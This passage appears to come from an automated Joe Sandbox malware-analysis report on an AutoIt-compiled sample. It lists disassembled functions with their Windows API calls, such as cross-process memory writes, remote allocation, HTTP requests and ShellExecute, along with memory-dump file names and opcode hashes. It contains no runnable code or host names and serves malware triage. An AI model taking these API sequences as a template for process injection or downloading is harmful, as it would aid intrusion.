                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 708495834-557222456
                                                                                                                    • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                    • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                    Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                    Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \$]$h
                                                                                                                    • API String ID: 4104443479-3262404753
                                                                                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                    Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                    • String ID: <$@
                                                                                                                    • API String ID: 2417854910-1426351568
                                                                                                                    • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                    • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                    Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3705125965-3916222277
                                                                                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                    Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                    • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                    • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                    • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                    • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                    Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                    • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                    • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                    • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                    Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                    • String ID: AU3_GetPluginDetails
                                                                                                                    • API String ID: 145871493-4132174516
                                                                                                                    • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                    • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                    • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                    • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                    Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                    • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                    • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                    • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                    Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 3375834691-2298589950
                                                                                                                    • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                    • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                    • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                    • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                    Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: $<
                                                                                                                    • API String ID: 4104443479-428540627
                                                                                                                    • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                    • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                    • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                    • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                    Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 1682464887-234962358
                                                                                                                    • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                    • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                    • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                    • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                    Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 1682464887-234962358
                                                                                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                    Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
